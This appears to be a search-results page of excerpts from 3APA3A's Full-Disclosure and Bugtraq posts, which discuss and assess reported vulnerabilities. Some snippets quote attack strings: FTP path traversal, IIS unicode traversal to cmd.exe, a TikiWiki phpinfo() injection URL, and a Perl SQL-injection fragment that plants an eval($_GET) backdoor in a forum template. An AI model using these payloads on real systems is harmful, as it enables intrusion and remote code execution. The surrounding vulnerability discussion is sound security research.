./A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n
GL> At least on win2k3. Therefore, the workarounds for kb975191 on
GL> microsoft.com are wrong.
GL> Guido Landi
GL> Vladimir '3APA3A' Dubrovin wrote:
>> Dear Thierry Zoller,
>>
>> I think yes, MKDIR
Dear Thierry Zoller,
I think yes, MKDIR is required. It should be variation of
S99-003/MS02-018. fuzzer should be very smart to create directory and
user both oversized buffer and ../ in NLST - it makes path longer than
MAX_PATH with existing directory.
--Monday, August 31, 20
Thierry,
I think inability of antivirus / intrusion detection to catch something
that is not malware/intrusion or malware in the form unused in-the-wild
is not vulnerability. Antivirus (generally) gives no preventive
protection. They can add signatures for your PoCs to their database
Dear Shaked Vax,
Are you sure Radware Team have analysed reflected attack via user's
browser (AppWall administrator visits malcrafted page, page redirects
his request to AppWall) before excluding remote vector?
--Thursday, July 2, 2009, 3:23:16 PM, you wrote to
full-disclosure@lists.gr
ly by obfuscating a link sent to the
>> s> "admin" of the device. this would obviously rely on the admin clicking on
>> s> the link, and is more of a phishing / social engineering style attack.
>> this
>> s> would also rely on the router being setup with
Dear Tom Neaves,
It still can be exploited from Internet even if "remote management" is
only accessible from local network. If you can trick user to visit Web
page, you can place a form on this page which targets to router and
request to router is issued from victim's browser.
--Tuesday
Dear Jim Parkhurst,
It may depend on video card and video drivers and/or amount of
memory/video memory. 9 years ago there was vulnerability in Internet
explorer with displaying scaled image:
http://securityvulns.com/advisories/ie5freeze.asp results
Dear Stefan Kanthak,
As far as I can see, Internet Explorer actually uses flash10b.ocx.
Adobe
Flash Player 10.0 r22
--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugt...@securityfocus.com:
SK> Windows Update (as well as Microsoft Update and the Automatic Update)
SK> installs an outdated (an
Dear iDefense Labs,
--Thursday, October 30, 2008, 11:24:35 PM, you wrote to [EMAIL PROTECTED]:
iL> VII. CVE INFORMATION
iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the
iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in
iL> the CVE list (http
Dear SkyOut,
I see no security impact here.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey);
requires administrative privileges. If user has ones, you can achieve
better results by deleting task manager of trojaning it.
You can also
Well, I cant' say it's all fake... It's all junk.
FD> OpenSSL 0.9.7j
FD> openssl-0.9.7j/fips-1.0/aes/fips_aesavs.c 973: User supplied data
FD> copied into fixed length buffer on the stack with no length
FD> verification.
Buffer overflow in non-suid test application (not compiled by default)
Dear Jose Nazario,
JN> te file you sent here contains a bunch of embeded nulls (every other
JN> character is 00). stripping those out reveals ... jose
JN> nazario, ph.d. http://monkey.org/~jose/
This is Little Endian UCS-2 Unicode, not a bunch of embedded nulls.
Dear Nick FitzGerald,
--Monday, January 14, 2008, 2:52:23 PM, you wrote to
full-disclosure@lists.grok.org.uk:
NF> U -- the only part of that likely to be relevant here is the last.
NF> These kinds of web page "compromises" are typically achieved through
NF> bad/ill-configured/non-updated
Dear crazy frog crazy frog,
Clear your computer from trojan, change FTP password for you site
hosting access, because it's stolen, access your hosting account via
FTP and remove additional text (usually at the end of the file, after
) from all HTML/PHP pages.
--Sunday, January 13,
n multiple persistant crossite
scriptings
Original article: http://websecurity.com.ua/1596/
XSS in Math Comment Spam Protection < 2.2
Original article: http://websecurity.com.ua/1576/
XSS in Captcha! <= 2.5d
Original article: http://websecurity.com.ua/1588/
--
http://securityvulns.com/
/
to reCaptcha developers, vulnerability is in Drupal code.
Original article: http://websecurity.com.ua/1505/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|
Dear [EMAIL PROTECTED],
SNMP is used to monitor printing queue status with LPR or RAW printing
protocol. This is standard feature in e.g. Windows and is not HP
specific. You can find this option in port settings.
--Friday, December 28, 2007, 7:01:40 PM, you wrote to
full-disclosure@lis
Dear [EMAIL PROTECTED],
VKve> Thank you, Captain Obvious - I specifically *said* that only one of them
VKve> needs to be blind spoofing.
There is a difference between "you needn't" and "you can't" and "you
won't". You say you needn't spoof another one. I say you won't and you
can't.
VKve>
Oct 2007 00:43:10 +0400, 3APA3A said:
>> Randomized ISN doesn't protect against MitM.
VKve> Doing a MitM is basically just spoofing two connections at the
VKve> same time. If you know how to do one, you know how to do two. And
VKve> if you know how to do one of them *
Valdis, you should back to Cretaceous period, because Oliver talks
about man-in-the-middle attack, not about blind TCP spoofing.
Randomized ISN doesn't protect against MitM.
--Thursday, October 25, 2007, 9:40:53 PM, you wrote to [EMAIL PROTECTED]:
VKve> On Thu, 25 Oct 2007 10
cal network.
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure -
Dear Paul Szabo,
Messages like this I've got are PDF spam without attempt to exploit
something, and are spammed since July. Not sure about this one though.
--Tuesday, October 23, 2007, 4:18:52 PM, you wrote to
full-disclosure@lists.grok.org.uk:
PS> In case you are interested... messages l
Dear Radu State,
As far as I understood the issue, it requires active Man-in-the-Middle
attack. Digest authentication, like any authentication without traffic
encryption or traffic signing, doesn't protect against active M-i-t-M,
because active M-i-t-M can always force client to
Dear Kristian Erik Hermansen,
Can not reproduce it on patched Windows XP. May be it's DynaZIP library
buffer overflows fixed with MS04-34.
--Monday, October 15, 2007, 12:19:31 PM, you wrote to
full-disclosure@lists.grok.org.uk:
KEH> I tested this on three Windows XP machines and was able to ma
Dear Moritz Naumann,
This vulnerability was found by ShAnKaR
http://securityvulns.ru/Sdocument162.html
and reported on Bugtraq yesterday (see "Vulnerabilities digest"
message). TikiWiki developers were informed on October, 8.
--Friday, October 12, 2007, 1:20:06 AM, you wrote to
f
:
http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu
Dear Thierry Zoller,
--Saturday, October 6, 2007, 9:06:51 PM, you wrote to [EMAIL PROTECTED]:
TZ> Dear Geo.,
G>> If the application is what exposes the URI handling routine to untrusted
G>> code from the internet,
TZ> Sorry, Untrusted code from the internet ?
TZ> The user clicks on a mailto l
Dear iDefense Labs,
--Wednesday, October 3, 2007, 6:32:03 PM, you wrote to [EMAIL PROTECTED]:
iL> The vulnerability exists in the kernel ioctl() handler for FIFOs. The
iL> I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO
iL> without actually removing them from the queue. O
Dear Panda Security Response,
[EMAIL PROTECTED] was contacted about this same vulnerability in
Panda Antivirus 2007 on August, 11 2006 (more than year ago) without
any results and response, until information was published in Bugtraq.
As far, as I can see, pandasecurity.com is Swedish
Dear Kees Cook,
CVE-2007-4033 is "Buffer overflow in php_gd2.dll in the gd (PHP_GD2)
extension in PHP 5.2.3 allows context-dependent attackers to execute
arbitrary code via a long argument to the imagepsloadfont function."
Please, provide valid CVE entry.
--Thursday, September 20, 2007,
Dear [EMAIL PROTECTED],
Either Subject "UPX parsing Arbitrary CodeExecution" or vulnerability
description "Infinite Loop in UPX packed files parsing" are wrong. Can
you provide more detailed information please? It's not clear, how
infinite loop can lead to remote code execution.
--Fri
re available from
http://securityvulns.com/source13951.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beat
Dear Joey Mengele,
Of cause, it's mitigating factor. But:
default PATH_MAX under Linux is 4096, and it's not hard to create
file/folder with longer path, it's impossible to access it,
E.g. folder with path longer than PATH_MAX:
bash$ pwd
pwd: could not get current directory: get
Dear Andrew Farmer,
And this one is not even new:
http://seclists.org/bugtraq/2005/Jul/0521.html
--Monday, August 6, 2007, 2:40:57 PM, you wrote to [EMAIL PROTECTED]:
AF> On 05 Aug 07, at 15:48, Beyond Security wrote:
>> /*
>> * off by one ebp overwrite in sudo prompt parsing function
>> *
Dear Mesut EREN,
http://securityvulns.com/search/soft.asp?sofname=horde
--Thursday, August 2, 2007, 10:09:31 AM, you wrote to
full-disclosure@lists.grok.org.uk:
ME> Hello everybody
ME> The Horde Mail is any have Vulnerability??
ME> I use to Horde Mail i want to test my email system.. Than
Dear [EMAIL PROTECTED],
Seems to be Another One George Bush Fan.
You know, there is vulnerability in all media players, it can be
exploited by opening MP3 file with George Bush bathroom singing. George
Bush fans are not vulnerable, yet they are still vulnerable to one you
described.
Dear coderman,
Whhooo! We will not see SPAM any more, because all botnets will be
overloaded with hash hacking!
--Monday, July 30, 2007, 11:30:51 PM, you wrote to [EMAIL PROTECTED]:
c> On 7/30/07, coderman <[EMAIL PROTECTED]> wrote:
>> gotta pay off that copacobana? 10,000 hashes for brea
Dear Tremaine Lea,
--Monday, July 30, 2007, 4:09:53 PM, you wrote to [EMAIL PROTECTED]:
TL> -BEGIN PGP SIGNED MESSAGE-
TL> Hash: SHA1
TL> $1-10/hash, and I'd actively seek/support an open source option.
5-10 days for full bruteforce? John-the-ripper on modern multi-core PC.
--
~/ZAR
Dear [EMAIL PROTECTED],
--Tuesday, July 24, 2007, 5:02:16 PM, you wrote to
full-disclosure@lists.grok.org.uk:
jkc> It seems to me the average SNR here could be greatly improved with any
jkc> one of several commonly available "community-based" filtering
jkc> mechanisms. Digg and Slashdot are b
Dear [EMAIL PROTECTED],
Please explain why is this "vulnerability" and not "just the bug".
--Friday, July 13, 2007, 5:26:17 PM, you wrote to
full-disclosure@lists.grok.org.uk:
esvnc> TeamIntell discovered local buffer overflow vulnerability
esvnc> in PIRS2007 (data collection of companies and
Dear Paul Craig,
--Wednesday, July 11, 2007, 1:37:03 AM, you wrote to [EMAIL PROTECTED]:
PC> http://www.test.com/scripts%c0%afcmd.exe
PC> http://www.test.com/scripts%e0%80%afcmd.exe
PC> http://www.test.com/scripts%c1%9ccmd.exe
PC> Web servers located behind a Tippingpoint IPS device which are c
sage (in Russian): http://securityvulns.ru/Rdocument425.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+---
, . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.ht
Dear Jamie Riden,
--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to [EMAIL PROTECTED]:
JR> (This is what I gathered from the original posting, but I might be wrong.)
JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,
Original BreakingPoint articles author
Dear H D Moore,
--Tuesday, June 19, 2007, 11:20:41 PM, you wrote to
full-disclosure@lists.grok.org.uk:
HDM> $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
HDM> nc webserver 80
According to recommendations of RFC 2616, section 4.1 Web server or
proxy server should ig
forum message.
(no further details is given by advisory author).
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
cap
:35:17 PM, you wrote to [EMAIL PROTECTED]:
k> Btw,
k> Here is a screenshot of the effect.
k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED]
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EM
# method which checks the path (for example /AUX.aspx is blocked).
k> Best Regards,
k> Kingcope
k> -----Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED]
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Sub
Dear kingcope,
It's vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is ex
%u00ABscript%u00BB
in different environments to bypass filtering in this way?
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number
Dear Brian Eaton,
--Monday, May 21, 2007, 11:28:27 PM, you wrote to [EMAIL PROTECTED]:
BE> Given how few application platforms decode full-width unicode to ASCII
BE> equivalents, is there a case to be made that those application
BE> platforms that do decide this conversion is a good idea are bro
Dear Brian Eaton,
--Monday, May 21, 2007, 11:48:09 PM, you wrote to [EMAIL PROTECTED]:
BE> On 5/21/07, 3APA3A <[EMAIL PROTECTED]> wrote:
>> It's not true, because it's quite convertible character. At least for IIS:
>>
>> http://example.com/test.asp?q=%u
Dear Brian Eaton,
--Monday, May 21, 2007, 6:22:21 PM, you wrote to [EMAIL PROTECTED]:
BE> If the SQL engine is processing queries in ASCII or ISO-8859-1, the
BE> conversion from unicode to the code page used by the engine will fail.
BE> Either the engine will give up on the query, or it might s
Dear Davide Del Vecchio,
It's also possible to recover deleted photos from almost any flash card
in almost any device (camera, mobile, etc) - it's a way general purpose
file systems work. Requirement to delete information securely is
enforced in devices certified to e.g. process US mil
Dear Tim Brown,
--Friday, May 4, 2007, 1:50:40 AM, you wrote to [EMAIL PROTECTED]:
TB> On Thursday 03 May 2007 22:13:15 3APA3A wrote:
>> This vulnerability for D-Link DSL-G624T was already reported by Jose
>> Ramon Palanco. See
>>
>> http://securityvulns.
Dear Tim Brown,
This vulnerability for D-Link DSL-G624T was already reported by Jose
Ramon Palanco. See
http://securityvulns.ru/Odocument816.html
Previously, same problem was reported for D-Link DSL-G604T by Qex
http://securityvulns.ru/Mdocument578.html
There were also few more problems r
Dear carl hardwick,
Do you know examples of phishing sites exploiting this vulnerability?
--Wednesday, April 18, 2007, 1:47:03 PM, you wrote to
full-disclosure@lists.grok.org.uk:
ch> This flaw
ch>
http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php
ch> r
Dear carl hardwick,
Both Firefox 2.0.0.3 and IE 6.0.2900.2180 resisted (Firefox stops
loading page after 500MB of memory, IE warns about script slowing down
performance). It's simple memory bomb, probably you are vulnerable
because you have <= 512 MB of RAM.
--Tuesday, April 17, 20
Dear Michal Majchrowicz,
This feature is not intended to protect against XSS, it's only intended
to inform you some information is transmitted in cleartext. You can
simply change
src="http://server2.com/xss.js
to
src="https://server2.com/xss.js
to avoid this message.
--Wednesday, A
Dear Micha³ Majchrowicz,
This image also effectively exploits stack overflow (?) in FastStone
Image Viewer 2.8, EIP/EBP is 0x41414141.
--Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]:
MM> Everytime you try to turn on the slideshow with a JPG file in the
MM> folder
Dear Tim,
--Wednesday, March 21, 2007, 7:24:35 PM, you wrote to
full-disclosure@lists.grok.org.uk:
T> Secondly, 3APA3A, birthday attacks against the collision-resistance
T> property of a hash take approximately 2^(b/2) time, where b is the
T> number of bits. That is, brute-force
at 160-bits) were 100% secure. The attack
BB> under discussion is reported to reduce that to the neighborhood of
BB> 60-something bits.
BB> I am not a mathematician though, so I would be perfectly willing to
BB> believe I was wrong about that.
BB>
and 3 years after loosing last pencil I may be
completely wrong in computations :)
--Wednesday, March 21, 2007, 9:48:55 PM, you wrote to [EMAIL PROTECTED]:
BB> 3APA3A wrote:
>> I know meaning of 'hash function' term, I wrote few articles on
>> challenge-respon
er calling ability to
bruteforce 160-bit hash 2000 times faster 'a crack'?
--Wednesday, March 21, 2007, 8:53:27 PM, you wrote to [EMAIL PROTECTED]:
BB> 3APA3A wrote:
>> First, by reading 'crack' I thought lady can recover full message by
>> it's s
Dear Michael Silk,
First, by reading 'crack' I thought lady can recover full message by
it's signature. After careful reading she can bruteforce collisions 2000
times faster.
SHA-1 is 160 bit hash. Bruteforced 2000 times faster, it retains the
strength of 149-bit hash for bruteforce co
Dear starcadi,
Again, a very effective way for user to exploit himself. How can you
elevate your privileges that way? Is dkftpbench suid?
--Monday, March 19, 2007, 10:32:27 PM, you wrote to
full-disclosure@lists.grok.org.uk:
s> Description:
s> dkftpbench is an FTP benchmark program inspire
Dear starcadi,
A very effective way for user to exploit himself. How can you elevate
your privileges this way? Is cftp suid?
--Tuesday, March 20, 2007, 12:52:13 AM, you wrote to
full-disclosure@lists.grok.org.uk:
s> Description:
s> CFTP is Comfortable FTP, a full screen ftp client.
s> Proo
Dear Thor (Hammer of God),
You are wrong at least for Windows XP/2003. There is a common temporary
directory
%WINDIR%\Temp
It's used as a %TEMP% if application is launched without local logon,
e.g. system service.
For example, services launched with LocalSystem account will have this
|\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and spon
Dear Laundrup, Jens,
C:\TEMP is not best example, but there are another.
Microsoft Word creates temporary file with predictable name in the same
directory with document. In the case of directory permissions like:
Users: Add & List
Creator Owner: Full control
(one user should not read documents
Dear Michele Cicciotti,
--Friday, March 9, 2007, 9:00:05 PM, you wrote to
full-disclosure@lists.grok.org.uk:
>> Scenario 1.1:
>>
>> Bob wishes to create "Bob private data" folder in "Public" folder to
>> place few private files. "Public" has at least "Write" permissions for
>> "User" g
Dear Roger A. Grimes,
--Friday, March 9, 2007, 6:49:13 PM, you wrote to [EMAIL PROTECTED]:
RAG> For one, I've been a sys admin for 20 years and NEVER created a
RAG> private folder under a public folder.
Nice. What about creating "Sales Reports" folder only head of Sales
department has
Dear M. Burnett,
--Friday, March 9, 2007, 7:12:31 AM, you wrote to [EMAIL PROTECTED]:
MB> 3APA3A, I just wanted to say that is very clever research you have done.
MB> It's true that this does require some re-thinking of security practices, but
MB> I don't think it
noted by everyone, but was unnoticed for
10 years.
RAG> Roger
RAG> *
RAG> *Roger A. Grimes, InfoWorld, Security Columnist
RAG> *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yad
: 3APA3A, http://securityvulns.com/
Vendor: Microsoft (and potentially another vendors)
Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit
for Windows 2000 and different utilities.
Access Vector: Local
Type: multiple/complex (weak design, insecure file operations, etc
Hello mopb,
phpinfo() crossite scripting
http://www.php-security.org/MOPB/MOPB-08-2007.html
was initially(?) reported in 2003 by Silent Needle
http://securityvulns.com/docs4647.html
--
/3APA3A
http://securityvulns.com/
___
Full-Disclosure
Probably, it's same or related issue for reported by nicob at nicob.net.
http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888
--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to
bugtraq@securityfocus.com:
n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.
.
--
/3APA3A
http://securityvulns.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
rver/citrix where all our stored documents can be stolen.
AT> In that case, only a software restriction policy will protect us.
AT> regards,
AT> Andres Tarasco
AT> 2007/2/22, 3APA3A <[EMAIL PROTECTED]>:
>>
>>
>>
>> Title: Microsoft Wi
Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW
informaton leak
Author: 3APA3A, http://securityvulns.com
Affected: Microsoft Windows 2000,XP,2003,Vista
Exploitable:Yes
Type: Remote (from local network), authentication
Dear Rajesh Sethumadhavan,
As Michal Zalewski pointed, there is no "critical" security impact,
because you (as attacker) can force browser to open files (it's common
thing, you can do it in any browser), but you can not access content of
these files. The only security impact in few cases i
Dear Michal Zalewski,
Mitigating factor: it doesn't work through proxy, because for proxy URI
is sent instead of URL and request will be incomplete.
GET http://evil.com
--Thursday, February 15, 2007, 1:23:01 AM, you wrote to [EMAIL PROTECTED]:
MZ> 'evil.com\x00foo.example.com' to be a part
: CVE-2007-0842
Author: 3APA3A, http://SecurityVulns.com/
Advisory URL: http://SecurityVulns.com/advisories/year3000.asp
Intro:
Since Microsoft Visual Studio 5.0, Visual C++ compiler defaults time_t
type to 64 bit integer and time functions to their 64-bit variants.
Vulnerability:
64
unprivileged user to Local System or
another user's account.
Author: 3APA3A <[EMAIL PROTECTED]>, http://SecurityVulns.com
Advisory URL: http://securityvulns.com/advisories/nnmrc.asp
SecurityVulns news URL: http://securityvulns.com/news/HP/NNM/RC/WP.html
CVE:CVE-2007-0819
Dear [EMAIL PROTECTED],
--Tuesday, February 6, 2007, 2:17:55 AM, you wrote to
full-disclosure@lists.grok.org.uk:
whc> I found this in deleted edits on english Wikipedia on Bluepill
whc> Vista backdoor security researcher Joanna Rutkowska:
whc> http://www.rutkowska.yoyo.pl
whc> What is goin
Dear lsi,
This approach is already implemented, at least partially, to limit
functionality of unknown applications. It can be found in multiple
personal firewalls or things like http://www.securesize.com/GeSWall/
There is a better approach - every "good" application should be signed
Dear XFOCUS Security Team,
A more complicated variant of this vulnerability (exhausting all
available descriptors and closing standard one) was reported by Joost
Pol for BSD systems. It's very funny to see commercial Unix variants
were not checked against it and simplest variant of
Dear Robert Swiecki,
--Sunday, January 14, 2007, 2:49:58 AM, you wrote to bugtraq@securityfocus.com:
RS> User-Agent: &*^ VDjh;
RS> olsMoasdasdzilla2%$(ls)2=++/-2121%&^#%^@&37.0 (X1230#$(ls)`ls`)
RS> asd%^*&%^dasdnhy/ Mnenhy/0.7.4.0
H. It doesn't seems like attempt to exploit
Dear /dev/null,
To manipulate GINA you need administrative privileges.
--Friday, December 29, 2006, 3:34:51 AM, you wrote to
full-disclosure@lists.grok.org.uk:
dn> Hi,
dn> This if from MS forums:
dn> http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1043407&SiteID=1
dn> Tested on Windows
Dear 0o_zeus_o0 elitemexico.org,
Thanks, published. http://www.security.nnov.ru/source13365.html
--Friday, December 22, 2006, 11:55:17 PM, you wrote to [EMAIL PROTECTED]:
0eo> ###
0eo> # Advisory #15 Title: Multiple Remote
before second free().
--Thursday, December 21, 2006, 11:11:29 PM, you wrote to [EMAIL PROTECTED]:
AS> 3APA3A wrote:
>> Killer{R} assumes the problem is in strcpy(), because it should not be
>> used for overlapping buffers, but at least ANSI implementation of strcpy
>> from
Dear Michele Cicciotti,
--Thursday, December 21, 2006, 6:20:54 PM, you wrote to
full-disclosure@lists.grok.org.uk:
>> There is interesting thing with event logging on Windows. The only
>> security aspect of it is event log record tampering and performance
>> degradation, but it may
Dear Tim,
--Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]:
T> 3APA3A, have you tried to see if elements like "%n!FORMAT!" used
T> recursively will invoke the wsprintf()-like behavior??
Yes, I did. It doesn't work.
--
~/ZARAZA
Но ведь кому
Dear lists,
in another Russian forum, Killer{R} made analysis on this issue using
Windows 2000 sources:
http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672
The problem is in win32k.sys' function GetHardErrorText, which tries to
prepare EXCEPTION data for event log, and seems to b
sting event log entries if you try
something like:
net send SOMEHOST %2
or
net use \\SOMEHOST\IPC$ /user:%1%2%3
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatle
ty.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk
Dear Kassem Nasser,
It's not clear, do you mean protection or protection evasion?
--Sunday, December 10, 2006, 10:50:41 PM, you wrote to
full-disclosure@lists.grok.org.uk:
KN> Dear all,
KN> I am interested in knowing evasion schemes for application based
KN> intrusions available,
--
~/ZARA
hursday, November 30, 2006, 1:02:07 AM, you wrote to [EMAIL PROTECTED]:
MF> I tried this on Paypal.com, with more than twenty consecutive incorrect
MF> passwords. I got no such offer. What paypal site were you using, and
MF> how many unsuccessful attempts is a couple?
MF> Matt
M
e unexperienced with PayPal, becase it's service for Russia is
new and very limited. But it makes me wonder: is this "Feature" known?
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my n
27;,[reg_image=>0,send=>'send',name=>1,message=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES
(char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);
--
/3APA3A
http://security.nnov.ru/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
1 - 100 of 145 matches
Mail list logo